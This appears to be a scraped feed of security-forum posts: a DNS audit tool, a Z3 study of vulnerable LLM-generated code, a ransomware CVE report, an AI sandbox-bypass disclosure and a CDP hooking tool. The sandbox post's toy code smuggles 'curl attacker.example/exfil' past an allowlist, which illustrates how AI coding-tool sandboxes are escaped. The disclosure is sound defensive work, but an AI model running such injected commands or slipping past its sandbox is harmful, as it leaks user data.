I wrote a practitioner critique of Anthropic's Mythos claims, focusing on exploitability vs. raw findings.
Would appreciate feedback from others in AppSec.
Hi everybody,
I have built an open-source CLI tool for DNS-related audits. Let me explain the rationale and the roadmap.
I have worked in DevSecOps for the past few years, and at three different companies I built some variation of this tool to handle issues raised by SOC tools and to support basic black-box pentesting. After doing it the third time, I decided I should take a stab at open source and build it properly myself.
What it offers is CAA, DMARC, DKIM, SPF, MX, and DNSSEC audits, plus some basic header checks (HSTS and CSP). Output can be rich terminal, JSON, Markdown, or SARIF, and an "sdk" layer is baked in so you can develop internal tools on top while getting access to fully typed Python objects.
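To make one of those checks concrete, here is a minimal sketch of what a DMARC audit boils down to. This is not dnsight's code or its SDK; it queries DNS directly with dnspython, and the two findings it reports are my own simplification:

```python
# Minimal DMARC audit sketch (not dnsight's implementation), using dnspython
# (pip install dnspython): fetch the _dmarc TXT record and flag a missing
# record or a monitor-only p=none policy.
import dns.resolver

def audit_dmarc(domain: str) -> list[str]:
    findings = []
    try:
        answers = dns.resolver.resolve(f"_dmarc.{domain}", "TXT")
    except (dns.resolver.NXDOMAIN, dns.resolver.NoAnswer):
        return [f"{domain}: no DMARC record published"]
    # A TXT rdata may be split into multiple character-strings; rejoin them.
    record = " ".join(b"".join(rdata.strings).decode() for rdata in answers)
    if "v=DMARC1" not in record:
        findings.append(f"{domain}: TXT at _dmarc is not a DMARC record")
    if "p=none" in record:
        findings.append(f"{domain}: policy is p=none (monitor-only)")
    return findings

print(audit_dmarc("example.com") or ["no findings"])
```

A real audit also needs to handle rua/ruf targets, subdomain policy, and multiple TXT answers, which is where a typed SDK earns its keep.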
The next step is honestly inspired by a BS scare-tactic email sent to the non-technical CEO and founder of a startup I was at, in which a salesperson made false claims about our DMARC posture to trick the CEO into a sales call. Personally, I'm quite passionate about security, and in a world of cat-and-mouse security (where the cats are the hackers/exploiters), I believe tools that cover the basics should be free. That leads to the next phase: a dockerised app that runs the audits against your configuration at regular intervals, with alerting through the appropriate channels.
I would appreciate anybody taking a look, giving it a go, and sharing feedback (or anybody who wants to help contribute!). This is my first go at open source and at building a tool like this, so really any feedback is appreciated. Docs can additionally be found at https://dnsight.github.io/dnsight/
I spent the last few months running Z3 SMT formal verification against 3,500 code artifacts generated by GPT-4o, Claude, Gemini, Llama, and Mistral.
Results:
- 55.8% contain at least one proven vulnerability
- 1,055 findings with concrete exploitation witnesses
- GPT-4o is worst at 62.4%; no model scores below 48%
- 6 industry tools combined (CodeQL, Semgrep, Cppcheck...) miss 97.8%
- Models catch 78.7% of their own bugs in review, but generate them anyway
Paper: https://arxiv.org/html/2604.05292v1
GitHub: https://github.com/dom-omg/broken-by-default
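For readers unfamiliar with the approach: below is a minimal, self-contained sketch of how SMT solving proves a bug and produces a concrete witness. The off-by-one bounds check is a toy of my own invention, not taken from the paper's corpus or its actual verification harness:

```python
# Toy SMT-based vulnerability proof with Z3 (pip install z3-solver).
# We model the path condition of a hypothetical guarded write,
#   if (idx <= BUF_LEN) buf[idx] = x;   // buggy: should be idx < BUF_LEN
# and ask the solver for a concrete input that reaches the write
# while landing outside the buffer (an "exploitation witness").
from z3 import BitVec, Solver, Or, sat

idx = BitVec("idx", 32)   # attacker-controlled index, signed 32-bit
BUF_LEN = 16

s = Solver()
s.add(idx <= BUF_LEN)                  # path condition: the guard passes
s.add(Or(idx < 0, idx >= BUF_LEN))     # violation: write is out of bounds

if s.check() == sat:
    # Prints a concrete witness, e.g. idx = 16 (or a negative index).
    print("vulnerable, witness idx =", s.model()[idx])
```

The witness is what separates a proven finding from a lint warning: you get an input value that demonstrably triggers the out-of-bounds write.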
Hi r/netsec community,
Q4 2025 data, from monitoring dark web leak sites and criminal forums throughout October-December 2025.
Numbers:
- 2,373 confirmed victims
- 125 active ransomware groups
- 134 countries, 27 industries
Group highlights:
- Qilin peaked at 481 attacks in Q4, up from 113 in Q1
- Cl0p skipped encryption entirely in most campaigns: pure data theft + extortion via Oracle EBS and Cleo zero-days
- 46.3% of activity attributed to smaller/unnamed groups; RaaS commoditization is real
CVEs exploited this quarter (with group attribution):
RCE:
- CVE-2025-10035 (Fortra GoAnywhere MFT) → Medusa
- CVE-2025-55182 (React Server Components) → Weaxor
- CVE-2025-61882 (Oracle E-Business Suite) → Cl0p
- CVE-2024-21762 (Fortinet FortiOS SSL VPN) → Qilin
Privilege Escalation:
- CVE-2025-29824 (Windows CLFS driver, escalation to SYSTEM) → Play
Auth Bypass:
- CVE-2025-61884 (Oracle E-Business Suite) → Cl0p
- CVE-2025-31324 (SAP NetWeaver, CVSS 10.0) → BianLian, RansomExx
Notable: DragonForce announced a white-label "cartel" model through underground forums. Operations linked to Scattered Spider suggest staged attack chains: initial access and ransomware deployment split between separate actors.
Full report: brandefense.io/reports/ransomware-trends-report-q4-2025/
With the news of hundreds of orgs being compromised daily, I saw a really cool red team tool that trains for this exact scenario. Has anyone here used this new white-hat tool? I'm thinking about ditching KB4 and even having our red teams use it for initial access.
AI coding tools are being shipped fast. In too many cases, basic security is not keeping up.
In our latest research, we found the same sandbox trust-boundary failure pattern across tools from Anthropic, Google, and OpenAI. Anthropic fixed and engaged quickly (CVE-2026-25725). Google did not ship a fix by disclosure. OpenAI closed the report as informational and did not address the core architectural issue.
That gap in response says a lot about vendor security posture.
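For context, here is a toy Python sketch of the failure class, where the trust boundary sits between a naive allowlist check and a shell that re-parses the command. It is illustrative only and not the actual vulnerable code from any of the vendors named above:

```python
# Toy sandbox trust-boundary failure: the check and the execution use
# different parsers. The allowlist validates only the first token, but
# shell=True re-parses the whole string, so `;` smuggles a second command
# across the boundary.
import subprocess

ALLOWED = {"ls", "cat", "git"}

def run_sandboxed(cmd: str) -> None:
    if cmd.split()[0] not in ALLOWED:      # check: first token looks safe
        raise PermissionError("blocked")
    subprocess.run(cmd, shell=True, check=False)  # execute: shell re-parses

# Passes the allowlist check, then executes an arbitrary second command:
run_sandboxed("ls; curl attacker.example/exfil")
```

The architectural fix is to validate and execute against the same parse, e.g. pass an argv list with shell=False, rather than patching individual bypasses.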
We benchmarked Opus 4.6's ability to find simple C vulns and found that the model flags about 1 in 4 flaws, with a very high false-positive rate and a lot of run-to-run inconsistency. Techniques like judge agents and requiring the model to justify its findings improve results to some extent, but they're still not great.
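For anyone curious what the judge-agent mitigation looks like in practice, here is a rough sketch. The `call_model` stub and the prompts are my assumptions, not the benchmark's actual harness:

```python
# Sketch of the "judge agent" pattern: a first pass flags candidate flaws,
# then an independent second pass must ground each flag in the code, and
# unjustified flags are dropped to cut false positives.
def call_model(prompt: str) -> str:
    # Stand-in for any chat-completion client; wire up your own here.
    raise NotImplementedError

def review_with_judge(c_source: str) -> list[str]:
    candidates = call_model(
        f"List suspected vulnerabilities, one per line:\n{c_source}"
    ).splitlines()
    kept = []
    for finding in candidates:
        verdict = call_model(
            "Quote the exact line of code that proves this finding, "
            f"or answer REJECT.\nFinding: {finding}\nCode:\n{c_source}"
        )
        if "REJECT" not in verdict:  # judge must justify the claim
            kept.append(finding)
    return kept
```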
I've been experimenting with Chrome DevTools Protocol primitives to build tools for reversing and debugging JavaScript at runtime.
The idea is to interact with execution by hooking functions without monkeypatching or modifying application code.
Conceptually, this is closer to a Frida-style instrumentation model (onEnter/onLeave handlers), but applied to the browser via CDP.
Early experiments are all implemented via CDP (debugger breakpoints + runtime evaluation), so the hooks also work inside closures and on non-exported code.
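As a rough illustration of the breakpoint-plus-evaluation flow (not the author's actual tool), here is a minimal Python client speaking raw CDP over a websocket. The target URL, line number, and websocket endpoint are placeholders; the ws URL would normally come from http://localhost:9222/json after starting Chrome with --remote-debugging-port=9222:

```python
# Minimal Frida-style "onEnter" over raw CDP: enable the debugger, set a
# breakpoint, and inspect the top call frame each time execution pauses.
import asyncio, itertools, json
import websockets  # pip install websockets

async def hook(ws_url: str) -> None:
    ids = itertools.count(1)
    async with websockets.connect(ws_url) as ws:
        async def send(method, params=None):
            await ws.send(json.dumps(
                {"id": next(ids), "method": method, "params": params or {}}))

        await send("Debugger.enable")
        # Break at a known location in the target script (placeholders).
        await send("Debugger.setBreakpointByUrl",
                   {"lineNumber": 0, "url": "https://example.com/app.js"})
        while True:
            msg = json.loads(await ws.recv())
            if msg.get("method") == "Debugger.paused":
                frame = msg["params"]["callFrames"][0]  # top frame = onEnter
                print("paused in", frame["functionName"], "at", frame["location"])
                # Debugger.evaluateOnCallFrame could inspect arguments here.
                await send("Debugger.resume")

asyncio.run(hook("ws://localhost:9222/devtools/page/PLACEHOLDER"))
```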
I'd really appreciate feedback, especially from people doing reverse engineering, bug bounty, or complex frontend debugging.